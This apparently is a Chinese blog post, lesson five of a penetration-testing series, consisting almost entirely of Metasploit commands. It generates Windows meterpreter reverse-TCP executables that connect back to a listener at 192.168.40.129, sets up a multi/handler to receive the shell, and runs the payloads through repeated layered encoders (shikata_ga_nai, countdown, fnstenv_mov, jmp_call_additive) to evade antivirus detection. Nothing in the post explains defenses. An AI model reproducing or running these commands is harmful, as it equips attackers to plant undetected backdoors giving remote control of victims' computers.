注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

Linux顶级渗透精髓--第五课 Metasploit Reverse Shell Free to kill  

2014-12-11 19:31:04|  分类: web安全渗透 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Metasploit Reverse Shell Free to kill

ifconfig

msfconsole

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.40.129 X > 2.exe

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.40.129

exploit

meterpreter > sysinfo

background

sessions

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.40.129 R | ./msfencode
-t exe -e x86/shikata_ga_nai -o /tmp/3.exe -c 6

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.40.129 R | ./msfencode
-t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/countdown -c 8
-o /tmp/4.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.40.129 R | ./msfencode
-t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/countdown -c 8 |
./msfencode -t raw -e x86/fnstenv_mov -c 8 | ./msfencode -t raw -c 8 -e x86/jmp_call_additive
-o /tmp/5.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.40.129 R | ./msfencode
-t raw -e x86/shikata_ga_nai -c 8 | ./msfencode -t raw -e x86/countdown -c 8 |
./msfencode -t raw -e x86/fnstenv_mov -c 8 | ./msfencode -t exe -c 8 -e x86/jmp_call_additive
> /tmp/6.exe
  评论这张
 
阅读(84)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017